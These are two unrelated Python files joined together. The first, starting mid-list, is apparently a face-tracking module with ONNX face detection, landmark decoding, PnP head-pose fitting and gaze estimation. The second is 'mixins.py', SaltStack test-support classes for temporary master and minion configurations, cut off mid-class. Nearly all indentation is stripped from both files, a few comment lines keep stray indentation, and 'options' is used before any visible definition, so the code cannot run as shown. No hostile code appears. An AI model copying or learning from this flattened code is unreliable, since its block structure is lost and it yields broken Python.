"mnv3_opt_medium.onnx",
"mnv3_opt_b.onnx"
]
model = self.models[self.model_type]
model_base_path = resolve(os.path.join("models"))
if model_dir is None:
if not os.path.exists(model_base_path):
model_base_path = resolve(os.path.join("..", "models"))
else:
model_base_path = model_dir
self.retinaface = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=max(max_threads,4), top_k=max_faces, res=(640, 640))
self.retinaface_scan = RetinaFaceDetector(model_path=os.path.join(model_base_path, "retinaface_640x640_opt.onnx"), json_path=os.path.join(model_base_path, "priorbox_640x640.json"), threads=2, top_k=max_faces, res=(640, 640))
self.use_retinaface = use_retinaface
# Single face instance with multiple threads
self.session = onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options)
# Multiple faces with single threads
self.sessions = []
self.max_workers = min(max_threads, max_faces)
extra_threads = max_threads % self.max_workers
for i in range(self.max_workers):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = max_threads // self.max_workers
if options.intra_op_num_threads < 1:
options.intra_op_num_threads = 1
elif i < extra_threads:
options.intra_op_num_threads += 1
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
self.sessions.append(onnxruntime.InferenceSession(os.path.join(model_base_path, model), sess_options=options))
self.input_name = self.session.get_inputs()[0].name
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = max(max_threads,4)
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.gaze_model = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_gaze32_split_opt.onnx"), sess_options=options)
options.intra_op_num_threads = 1
self.gaze_model_single = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_gaze32_split_opt.onnx"), sess_options=options)
self.detection = onnxruntime.InferenceSession(os.path.join(model_base_path, "mnv3_detection_opt.onnx"), sess_options=options)
self.faces = []
# Image normalization constants
self.mean = np.float32(np.array([0.485, 0.456, 0.406]))
self.std = np.float32(np.array([0.229, 0.224, 0.225]))
self.mean = self.mean / self.std
self.std = self.std * 255.0
# PnP solving
self.face_3d = np.array([
[ 0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.448998827123556, 0.166995837790733, -0.765143004071253],
[ 0.437431554952677, 0.022655479179981, -0.739267175112735],
[ 0.415033422928434, -0.088941454648772, -0.747947437846473],
[ 0.389123587370091, -0.232380029794684, -0.704788385327458],
[ 0.334630113904382, -0.361265387599081, -0.615587579236862],
[ 0.263725112132858, -0.460009725616771, -0.491479221041573],
[ 0.16241621322721 , -0.558037146073869, -0.339445180872282],
[ 0. , -0.621079019321682, -0.287294770748887],
[-0.16241621322721 , -0.558037146073869, -0.339445180872282],
[-0.263725112132858, -0.460009725616771, -0.491479221041573],
[-0.334630113904382, -0.361265387599081, -0.615587579236862],
[-0.389123587370091, -0.232380029794684, -0.704788385327458],
[-0.415033422928434, -0.088941454648772, -0.747947437846473],
[-0.437431554952677, 0.022655479179981, -0.739267175112735],
[-0.448998827123556, 0.166995837790733, -0.765143004071253],
[-0.4551769692672 , 0.300895790030204, -0.764429433974752],
[ 0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0.322196658344302, 0.464439136821772, -0.250558059367669],
[ 0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[ 0.186875436782135, 0.44706071961879 , -0.145299823706503],
[ 0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.120880983543622, 0.423566314072968, -0.110757158774771],
[-0.186875436782135, 0.44706071961879 , -0.145299823706503],
[-0.25409760441282 , 0.46420381416882 , -0.208177722146526],
[-0.322196658344302, 0.464439136821772, -0.250558059367669],
[-0.385529968662985, 0.402800553948697, -0.310031082540741],
[ 0. , 0.293332603215811, -0.137582088779393],
[ 0. , 0.194828701837823, -0.069158109325951],
[ 0. , 0.103844017393155, -0.009151819844964],
[ 0. , 0. , 0. ],
[ 0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.046439347377934, -0.057675223874769, -0.102990627164664],
[ 0. , -0.068753126205604, -0.090545348482397],
[-0.046439347377934, -0.057675223874769, -0.102990627164664],
[-0.080626352317973, -0.041276068128093, -0.134161035564826],
[ 0.315905195966084, 0.298337502555443, -0.285107407636464],
[ 0.275252345439353, 0.312721904921771, -0.244558251170671],
[ 0.176394511553111, 0.311907184376107, -0.219205360345231],
[ 0.131229723798772, 0.284447361805627, -0.234239149487417],
[ 0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.131229723798772, 0.284447361805627, -0.234239149487417],
[-0.176394511553111, 0.311907184376107, -0.219205360345231],
[-0.275252345439353, 0.312721904921771, -0.244558251170671],
[-0.315905195966084, 0.298337502555443, -0.285107407636464],
[-0.279433549294448, 0.267363071770222, -0.248441437111633],
[-0.184124948330084, 0.260179585304867, -0.226590776513707],
[ 0.121155252430729, -0.208988660580347, -0.160606287940521],
[ 0.041356305910044, -0.194484199722098, -0.096159882202821],
[ 0. , -0.205180167345702, -0.083299217789729],
[-0.041356305910044, -0.194484199722098, -0.096159882202821],
[-0.121155252430729, -0.208988660580347, -0.160606287940521],
[-0.132325402795928, -0.290857984604968, -0.187067868218105],
[-0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0. , -0.343742581679188, -0.113925986025684],
[ 0.064137791831655, -0.325377847425684, -0.158924039726607],
[ 0.132325402795928, -0.290857984604968, -0.187067868218105],
[ 0.181481567104525, -0.243239316141725, -0.231284988892766],
[ 0.083999507750469, -0.239717753728704, -0.155256465640701],
[ 0. , -0.256058040176369, -0.0950619498899 ],
[-0.083999507750469, -0.239717753728704, -0.155256465640701],
[-0.181481567104525, -0.243239316141725, -0.231284988892766],
[-0.074036069749345, -0.250689938345682, -0.177346470406188],
[ 0. , -0.264945854681568, -0.112349967428413],
[ 0.074036069749345, -0.250689938345682, -0.177346470406188],
# Pupils and eyeball centers
[ 0.257990002632141, 0.276080012321472, -0.219998998939991],
[-0.257990002632141, 0.276080012321472, -0.219998998939991],
[ 0.257990002632141, 0.276080012321472, -0.324570998549461],
[-0.257990002632141, 0.276080012321472, -0.324570998549461]
], np.float32)
self.camera = np.array([[width, 0, width/2], [0, width, height/2], [0, 0, 1]], np.float32)
self.inverse_camera = np.linalg.inv(self.camera)
self.dist_coeffs = np.zeros((4,1))
self.frame_count = 0
self.width = width
self.height = height
self.threshold = threshold
self.max_faces = max_faces
self.max_threads = max_threads
self.discard = 0
self.discard_after = discard_after
self.detected = 0
self.wait_count = 0
self.scan_every = scan_every
self.bbox_growth = bbox_growth
self.silent = silent
self.res = 224.
self.res_i = int(self.res)
self.no_gaze = no_gaze
self.debug_gaze = False
self.face_info = [FaceInfo(id, self) for id in range(max_faces)]
self.fail_count = 0
def detect_faces(self, frame):
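        # The 224x224 detection net returns a 56x56 confidence map plus a radius map;
        # peaks that survive the maxpool-based non-maximum suppression become square
        # face boxes, which are then scaled back to the original frame size.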
im = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_LINEAR)[:,:,::-1] / self.std - self.mean
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
outputs, maxpool = self.detection.run([], {'input': im})
outputs = np.array(outputs)
maxpool = np.array(maxpool)
outputs[0, 0, outputs[0, 0] != maxpool[0, 0]] = 0
detections = np.flip(np.argsort(outputs[0,0].flatten()))
results = []
for det in detections[0:self.max_faces]:
y, x = det // 56, det % 56
c = outputs[0, 0, y, x]
r = outputs[0, 1, y, x] * 112.
x *= 4
y *= 4
r *= 1.0
if c < self.threshold:
break
results.append((x - r, y - r, 2 * r, 2 * r * 1.0))
results = np.array(results).astype(np.float32)
if results.shape[0] > 0:
results[:, [0,2]] *= frame.shape[1] / 224.
results[:, [1,3]] *= frame.shape[0] / 224.
return results
def landmarks(self, tensor, crop_info):
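        # Decode each of the 66 landmarks from a 28x28 heatmap: take the argmax cell,
        # refine it with the matching x/y offset channels, then map the point back to
        # frame coordinates using the crop offset and scale.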
crop_x1, crop_y1, scale_x, scale_y, _ = crop_info
avg_conf = 0
lms = []
res = self.res - 1
for i in range(0, 66):
m = int(tensor[i].argmax())
x = m // 28
y = m % 28
conf = float(tensor[i][x,y])
avg_conf = avg_conf + conf
off_x = res * ((1. * logit(tensor[66 + i][x, y])) - 0.0)
off_y = res * ((1. * logit(tensor[66 * 2 + i][x, y])) - 0.0)
off_x = math.floor(off_x + 0.5)
off_y = math.floor(off_y + 0.5)
lm_x = crop_y1 + scale_y * (res * (float(x) / 27.) + off_x)
lm_y = crop_x1 + scale_x * (res * (float(y) / 27.) + off_y)
lms.append((lm_x,lm_y,conf))
avg_conf = avg_conf / 66.
return (avg_conf, np.array(lms))
def estimate_depth(self, face_info):
        lms = np.concatenate((face_info.lms, np.array([[face_info.eye_state[0][1], face_info.eye_state[0][2], face_info.eye_state[0][3]], [face_info.eye_state[1][1], face_info.eye_state[1][2], face_info.eye_state[1][3]]], float)), 0)
image_pts = np.array(lms)[face_info.contour_pts, 0:2]
success = False
if not face_info.rotation is None:
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=np.transpose(face_info.rotation), tvec=np.transpose(face_info.translation), flags=cv2.SOLVEPNP_ITERATIVE)
else:
rvec = np.array([0, 0, 0], np.float32)
tvec = np.array([0, 0, 0], np.float32)
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=rvec, tvec=tvec, flags=cv2.SOLVEPNP_ITERATIVE)
rotation = face_info.rotation
translation = face_info.translation
pts_3d = np.zeros((70,3), np.float32)
if not success:
face_info.rotation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
return False, np.zeros(4), np.zeros(3), 99999., pts_3d, lms
else:
face_info.rotation = np.transpose(face_info.rotation)
face_info.translation = np.transpose(face_info.translation)
rmat, _ = cv2.Rodrigues(rotation)
inverse_rotation = np.linalg.inv(rmat)
pnp_error = 0.0
for i, pt in enumerate(face_info.face_3d):
if i == 68:
# Right eyeball
                # Eyeballs have an average diameter of 12.5mm and the distance between eye corners is 30-35mm, so a conversion factor of 0.385 can be applied
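                # (0.385 is roughly 12.5 / 32.5, i.e. the quoted diameter divided by the mid-range corner distance)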
eye_center = (pts_3d[36] + pts_3d[39]) / 2.0
d_corner = np.linalg.norm(pts_3d[36] - pts_3d[39])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[i] = pt_3d
continue
if i == 69:
# Left eyeball
eye_center = (pts_3d[42] + pts_3d[45]) / 2.0
d_corner = np.linalg.norm(pts_3d[42] - pts_3d[45])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[i] = pt_3d
continue
if i == 66:
d1 = np.linalg.norm(lms[i,0:2] - lms[36,0:2])
d2 = np.linalg.norm(lms[i,0:2] - lms[39,0:2])
d = d1 + d2
pt = (pts_3d[36] * d1 + pts_3d[39] * d2) / d
if i == 67:
d1 = np.linalg.norm(lms[i,0:2] - lms[42,0:2])
d2 = np.linalg.norm(lms[i,0:2] - lms[45,0:2])
d = d1 + d2
pt = (pts_3d[42] * d1 + pts_3d[45] * d2) / d
reference = rmat.dot(pt)
reference = reference + face_info.translation
reference = self.camera.dot(reference)
depth = reference[2]
if i < 17 or i == 30:
reference = reference / depth
e1 = lms[i][0] - reference[0]
e2 = lms[i][1] - reference[1]
pnp_error += e1*e1 + e2*e2
pt_3d = np.array([lms[i][0] * depth, lms[i][1] * depth, depth], np.float32)
pt_3d = self.inverse_camera.dot(pt_3d)
pt_3d = pt_3d - face_info.translation
pt_3d = inverse_rotation.dot(pt_3d)
pts_3d[i,:] = pt_3d[:]
pnp_error = np.sqrt(pnp_error / (2.0 * image_pts.shape[0]))
if pnp_error > 300:
face_info.fail_count += 1
if face_info.fail_count > 5:
# Something went wrong with adjusting the 3D model
if not self.silent:
print(f"Detected anomaly when 3D fitting face {face_info.id}. Resetting.")
face_info.face_3d = copy.copy(self.face_3d)
face_info.rotation = None
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.update_counts = np.zeros((66,2))
face_info.update_contour()
else:
face_info.fail_count = 0
euler = cv2.RQDecomp3x3(rmat)[0]
return True, matrix_to_quaternion(rmat), euler, pnp_error, pts_3d, lms
def preprocess(self, im, crop):
x1, y1, x2, y2 = crop
im = np.float32(im[y1:y2, x1:x2,::-1]) # Crop and BGR to RGB
im = cv2.resize(im, (self.res_i, self.res_i), interpolation=cv2.INTER_LINEAR) / self.std - self.mean
#im = cv2.resize(im, (224, 224), interpolation=cv2.INTER_LINEAR) / 255.0
#im = (im - mean) / std
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
return im
def equalize(self, im):
im_yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV)
im_yuv[:,:,0] = cv2.equalizeHist(im_yuv[:,:,0])
return cv2.cvtColor(im_yuv, cv2.COLOR_YUV2BGR)
def corners_to_eye(self, corners, w, h, flip):
((cx1, cy1), (cx2, cy2)) = corners
c1 = np.array([cx1, cy1])
c2 = np.array([cx2, cy2])
c2, a = compensate(c1, c2)
center = (c1 + c2) / 2.0
radius = np.linalg.norm(c1 - c2) / 2.0
radius = np.array([radius * 1.4, radius * 1.2])
upper_left = clamp_to_im(center - radius, w, h)
lower_right = clamp_to_im(center + radius, w, h)
return upper_left, lower_right, center, radius, c1, a
def prepare_eye(self, frame, full_frame, lms, flip):
outer_pt = tuple(lms[0])
inner_pt = tuple(lms[1])
h, w, _ = frame.shape
(x1, y1), (x2, y2), center, radius, reference, a = self.corners_to_eye((outer_pt, inner_pt), w, h, flip)
im = rotate_image(frame[:, :, ::], a, reference)
im = im[int(y1):int(y2), int(x1):int(x2),:]
if np.prod(im.shape) < 1:
return None, None, None, None, None, None
if flip:
im = cv2.flip(im, 1)
scale = np.array([(x2 - x1), (y2 - y1)]) / 32.
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_LINEAR)
#im = self.equalize(im)
if self.debug_gaze:
if not flip:
full_frame[0:32, 0:32] = im
else:
full_frame[0:32, 32:64] = im
im = im.astype(np.float32)[:,:,::-1] / self.std - self.mean
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,2,1))
return im, x1, y1, scale, reference, a
def extract_face(self, frame, lms):
lms = np.array(lms)[:,0:2][:,::-1]
x1, y1 = tuple(lms.min(0))
x2, y2 = tuple(lms.max(0))
radius_x = 1.2 * (x2 - x1) / 2.0
radius_y = 1.2 * (y2 - y1) / 2.0
radius = np.array((radius_x, radius_y))
center = (np.array((x1, y1)) + np.array((x2, y2))) / 2.0
w, h, _ = frame.shape
x1, y1 = clamp_to_im(center - radius, h, w)
x2, y2 = clamp_to_im(center + radius + 1, h, w)
offset = np.array((x1, y1))
        lms = (lms[:, 0:2] - offset).astype(int)
frame = frame[y1:y2, x1:x2]
return frame, lms, offset
def get_eye_state(self, frame, lms, single=False):
if self.no_gaze:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
lms = np.array(lms)
e_x = [0,0]
e_y = [0,0]
scale = [0,0]
reference = [None, None]
angles = [0, 0]
face_frame, lms, offset = self.extract_face(frame, lms)
(right_eye, e_x[0], e_y[0], scale[0], reference[0], angles[0]) = self.prepare_eye(face_frame, frame, np.array([lms[36,0:2], lms[39,0:2]]), False)
(left_eye, e_x[1], e_y[1], scale[1], reference[1], angles[1]) = self.prepare_eye(face_frame, frame, np.array([lms[42,0:2], lms[45,0:2]]), True)
if right_eye is None or left_eye is None:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
both_eyes = np.concatenate((right_eye, left_eye))
results = None
if single:
results = self.gaze_model_single.run([], {self.input_name: both_eyes})
else:
results = self.gaze_model.run([], {self.input_name: both_eyes})
open = [0, 0]
open[0] = 1#results[1][0].argmax()
open[1] = 1#results[1][1].argmax()
results = np.array(results[0])
eye_state = []
for i in range(2):
m = int(results[i][0].argmax())
x = m // 8
y = m % 8
conf = float(results[i][0][x,y])
off_x = 32.0 * logit(results[i][1][x, y], 8.0)
off_y = 32.0 * logit(results[i][2][x, y], 8.0)
if i == 1:
eye_x = 32.0 * float(x) / 8.0 + off_x
else:
eye_x = 32.0 * float(x) / 8.0 + off_x
eye_y = 32.0 * float(y) / 8.0 + off_y
if self.debug_gaze:
if i == 0:
frame[int(eye_y), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), int(eye_x+1)] = (0, 0, 255)
else:
frame[int(eye_y), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), 32+int(eye_x+1)] = (0, 0, 255)
if i == 0:
eye_x = e_x[i] + scale[i][0] * eye_x
else:
eye_x = e_x[i] + scale[i][0] * (32. - eye_x)
eye_y = e_y[i] + scale[i][1] * eye_y
eye_x, eye_y = rotate(reference[i], (eye_x, eye_y), -angles[i])
eye_x = eye_x + offset[0]
eye_y = eye_y + offset[1]
eye_state.append([open[i], eye_y, eye_x, conf])
return eye_state
def assign_face_info(self, results):
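        # Greedily match each new detection to the nearest previously tracked face
        # (by mean landmark coordinate) so that face ids stay stable between frames.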
result_coords = []
adjusted_results = []
for conf, (lms, eye_state), conf_adjust in results:
adjusted_results.append((conf - conf_adjust, (lms, eye_state)))
result_coords.append(np.array(lms)[:, 0:2].mean(0))
results = adjusted_results
candidates = [[]] * self.max_faces
max_dist = 2 * np.linalg.norm(np.array([self.width, self.height]))
for i, face_info in enumerate(self.face_info):
for j, coord in enumerate(result_coords):
if face_info.coord is None:
candidates[i].append((max_dist, i, j))
else:
candidates[i].append((np.linalg.norm(face_info.coord - coord), i, j))
for i, candidate in enumerate(candidates):
candidates[i] = sorted(candidate)
found = 0
target = len(results)
used_results = {}
used_faces = {}
while found < target:
min_list = min(candidates)
candidate = min_list.pop(0)
face_idx = candidate[1]
result_idx = candidate[2]
if not result_idx in used_results and not face_idx in used_faces:
self.face_info[face_idx].update(results[result_idx], result_coords[result_idx], self.frame_count)
min_list.clear()
used_results[result_idx] = True
used_faces[face_idx] = True
found += 1
if len(min_list) == 0:
min_list.append((2 * max_dist, face_idx, result_idx))
for face_info in self.face_info:
if face_info.frame_count != self.frame_count:
face_info.update(None, None, self.frame_count)
def predict(self, frame, additional_faces=[]):
self.frame_count += 1
start = time.perf_counter()
im = frame
duration_fd = 0.0
duration_pp = 0.0
duration_model = 0.0
duration_pnp = 0.0
new_faces = []
new_faces.extend(self.faces)
bonus_cutoff = len(self.faces)
new_faces.extend(additional_faces)
self.wait_count += 1
if self.detected == 0:
start_fd = time.perf_counter()
if self.use_retinaface > 0:
retinaface_detections = self.retinaface.detect_retina(frame)
new_faces.extend(retinaface_detections)
else:
new_faces.extend(self.detect_faces(frame))
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
elif self.detected < self.max_faces:
if self.use_retinaface > 0:
new_faces.extend(self.retinaface_scan.get_results())
if self.wait_count >= self.scan_every:
if self.use_retinaface > 0:
self.retinaface_scan.background_detect(frame)
else:
start_fd = time.perf_counter()
new_faces.extend(self.detect_faces(frame))
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
else:
self.wait_count = 0
if len(new_faces) < 1:
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms")
return []
crops = []
crop_info = []
num_crops = 0
for j, (x,y,w,h) in enumerate(new_faces):
crop_x1 = x - int(w * 0.1)
crop_y1 = y - int(h * 0.125)
crop_x2 = x + w + int(w * 0.1)
crop_y2 = y + h + int(h * 0.125)
crop_x1, crop_y1 = clamp_to_im((crop_x1, crop_y1), self.width, self.height)
crop_x2, crop_y2 = clamp_to_im((crop_x2, crop_y2), self.width, self.height)
scale_x = float(crop_x2 - crop_x1) / self.res
scale_y = float(crop_y2 - crop_y1) / self.res
if crop_x2 - crop_x1 < 4 or crop_y2 - crop_y1 < 4:
continue
start_pp = time.perf_counter()
crop = self.preprocess(im, (crop_x1, crop_y1, crop_x2, crop_y2))
duration_pp += 1000 * (time.perf_counter() - start_pp)
crops.append(crop)
crop_info.append((crop_x1, crop_y1, scale_x, scale_y, 0.0 if j >= bonus_cutoff else 0.1))
num_crops += 1
start_model = time.perf_counter()
outputs = {}
if num_crops == 1:
output = self.session.run([], {self.input_name: crops[0]})[0]
conf, lms = self.landmarks(output[0], crop_info[0])
if conf > self.threshold:
eye_state = self.get_eye_state(frame, lms)
outputs[crop_info[0]] = (conf, (lms, eye_state), 0)
else:
started = 0
results = queue.Queue()
for i in range(min(num_crops, self.max_workers)):
thread = threading.Thread(target=worker_thread, args=(self.sessions[started], frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
returned = 0
while returned < num_crops:
result = results.get(True)
if len(result) != 1:
session, conf, lms, sample_crop_info, idx = result
outputs[sample_crop_info] = (conf, lms, idx)
else:
session = result[0]
returned += 1
if started < num_crops:
thread = threading.Thread(target=worker_thread, args=(session, frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
actual_faces = []
good_crops = []
for crop in crop_info:
if crop not in outputs:
continue
conf, lms, i = outputs[crop]
x1, y1, _ = lms[0].min(0)
x2, y2, _ = lms[0].max(0)
bb = (x1, y1, x2 - x1, y2 - y1)
outputs[crop] = (conf, lms, i, bb)
actual_faces.append(bb)
good_crops.append(crop)
groups = group_rects(actual_faces)
best_results = {}
for crop in good_crops:
conf, lms, i, bb = outputs[crop]
if conf < self.threshold:
                continue
group_id = groups[str(bb)][0]
if not group_id in best_results:
best_results[group_id] = [-1, [], 0]
if conf > self.threshold and best_results[group_id][0] < conf + crop[4]:
best_results[group_id][0] = conf + crop[4]
best_results[group_id][1] = lms
best_results[group_id][2] = crop[4]
sorted_results = sorted(best_results.values(), key=lambda x: x[0], reverse=True)[:self.max_faces]
self.assign_face_info(sorted_results)
duration_model = 1000 * (time.perf_counter() - start_model)
results = []
detected = []
start_pnp = time.perf_counter()
for face_info in self.face_info:
if face_info.alive and face_info.conf > self.threshold:
face_info.success, face_info.quaternion, face_info.euler, face_info.pnp_error, face_info.pts_3d, face_info.lms = self.estimate_depth(face_info)
face_info.adjust_3d()
lms = face_info.lms[:, 0:2]
x1, y1 = tuple(lms.min(0))
x2, y2 = tuple(lms.max(0))
bbox = (y1, x1, y2 - y1, x2 - x1)
face_info.bbox = bbox
detected.append(bbox)
results.append(face_info)
duration_pnp += 1000 * (time.perf_counter() - start_pnp)
if len(detected) > 0:
self.detected = len(detected)
self.faces = detected
self.discard = 0
else:
self.detected = 0
self.discard += 1
if self.discard > self.discard_after:
self.faces = []
else:
if self.bbox_growth > 0:
faces = []
for (x,y,w,h) in self.faces:
x -= w * self.bbox_growth
y -= h * self.bbox_growth
w += 2 * w * self.bbox_growth
h += 2 * h * self.bbox_growth
faces.append((x,y,w,h))
self.faces = faces
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms (detect: {duration_fd:.2f}ms, crop: {duration_pp:.2f}, track: {duration_model:.2f}ms, 3D points: {duration_pnp:.2f}ms)")
results = sorted(results, key=lambda x: x.id)
return results
|
mixins.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: Pedro Algarvio (pedro@algarvio.me)
=============
Class Mix-Ins
=============
Some reusable class Mixins
'''
# pylint: disable=repr-flag-used-in-string
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import types
import atexit
import pprint
import logging
import tempfile
import functools
import subprocess
import multiprocessing
# Import Salt Testing Libs
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.paths import CODE_DIR
# Import salt libs
import salt.config
import salt.utils.event
import salt.utils.files
import salt.utils.functools
import salt.utils.path
import salt.utils.stringutils
import salt.utils.yaml
import salt.version
import salt.exceptions
import salt.utils.process
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt._compat import ElementTree as etree
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import zip # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
class CheckShellBinaryNameAndVersionMixin(object):
'''
    Simple class mix-in meant to be used alongside :class:`ShellTestCase<tests.support.case.ShellTestCase>`,
    which adds a test case verifying that Salt's CLI tools report the proper version.
'''
_call_binary_ = None
_call_binary_expected_version_ = None
def test_version_includes_binary_name(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
if self._call_binary_expected_version_ is None:
# Late import
self._call_binary_expected_version_ = salt.version.__version__
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(self._call_binary_, out)
self.assertIn(self._call_binary_expected_version_, out)
class AdaptedConfigurationTestCaseMixin(object):
__slots__ = ()
@staticmethod
def get_temp_config(config_for, **config_overrides):
rootdir = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
conf_dir = os.path.join(rootdir, 'conf')
for key in ('cachedir', 'pki_dir', 'sock_dir'):
if key not in config_overrides:
config_overrides[key] = key
if 'log_file' not in config_overrides:
config_overrides['log_file'] = 'logs/{}.log'.format(config_for)
if 'user' not in config_overrides:
config_overrides['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
config_overrides['root_dir'] = rootdir
cdict = AdaptedConfigurationTestCaseMixin.get_config(config_for, from_scratch=True)
if config_for in ('master', 'client_config'):
rdict = salt.config.apply_master_config(config_overrides, cdict)
if config_for == 'minion':
rdict = salt.config.apply_minion_config(config_overrides, cdict)
verify_env([os.path.join(rdict['pki_dir'], 'minions'),
os.path.join(rdict['pki_dir'], 'minions_pre'),
os.path.join(rdict['pki_dir'], 'minions_rejected'),
os.path.join(rdict['pki_dir'], 'minions_denied'),
os.path.join(rdict['cachedir'], 'jobs'),
os.path.join(rdict['cachedir'], 'raet'),
os.path.join(rdict['cachedir'], 'tokens'),
os.path.join(rdict['root_dir'], 'cache', 'tokens'),
os.path.join(rdict['pki_dir'], 'accepted'),
os.path.join(rdict['pki_dir'], 'rejected'),
os.path.join(rdict['pki_dir'], 'pending'),
os.path.dirname(rdict['log_file']),
rdict['sock_dir'],
conf_dir
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=rdict['root_dir'],
)
rdict['config_dir'] = conf_dir
rdict['conf_file'] = os.path.join(conf_dir, config_for)
with salt.utils.files.fopen(rdict['conf_file'], 'w') as wfh:
salt.utils.yaml.safe_dump(rdict, wfh, default_flow_style=False)
return rdict
@staticmethod
def get_config(config_for, from_scratch=False):
if from_scratch:
if config_for in ('master', 'syndic_master'):
return salt.config.master_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
elif config_for in ('minion', 'sub_minion'):
return salt.config.minion_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
elif config_for in ('syndic',):
return salt.config.syndic_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for),
AdaptedConfigurationTestCaseMixin.get_config_file_path('minion')
)
elif config_for == 'client_config':
return salt.config.client_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path('master')
)
if config_for not in RUNTIME_VARS.RUNTIME_CONFIGS:
if config_for in ('master', 'syndic_master'):
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.master_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
)
elif config_for in ('minion', 'sub_minion'):
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.minion_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for)
)
)
elif config_for in ('syndic',):
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.syndic_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path(config_for),
AdaptedConfigurationTestCaseMixin.get_config_file_path('minion')
)
)
elif config_for == 'client_config':
RUNTIME_VARS.RUNTIME_CONFIGS[config_for] = freeze(
salt.config.client_config(
AdaptedConfigurationTestCaseMixin.get_config_file_path('master')
)
)
return RUNTIME_VARS.RUNTIME_CONFIGS[config_for]
@property
def config_dir(self):
return RUNTIME_VARS.TMP_CONF_DIR
def get_config_dir(self):
log.warning('Use the config_dir attribute instead of calling get_config_dir()')
return self.config_dir
@staticmethod
def get_config_file_path(filename):
if filename == 'syndic_master':
return os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master')
if filename == 'syndic':
return os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion')
if filename == 'sub_minion':
return os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion')
return os.path.join(RUNTIME_VARS.TMP_CONF_DIR, filename)
@property
def master_opts(self):
'''
Return the options used for the master
'''
return self.get_config('master')
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return self.get_config('minion')
@property
def sub_minion_opts(self):
'''
Return the options used for the sub_minion
'''
return self.get_config('sub_minion')
class SaltClientTestCaseMixin(AdaptedConfigurationTestCaseMixin):
'''
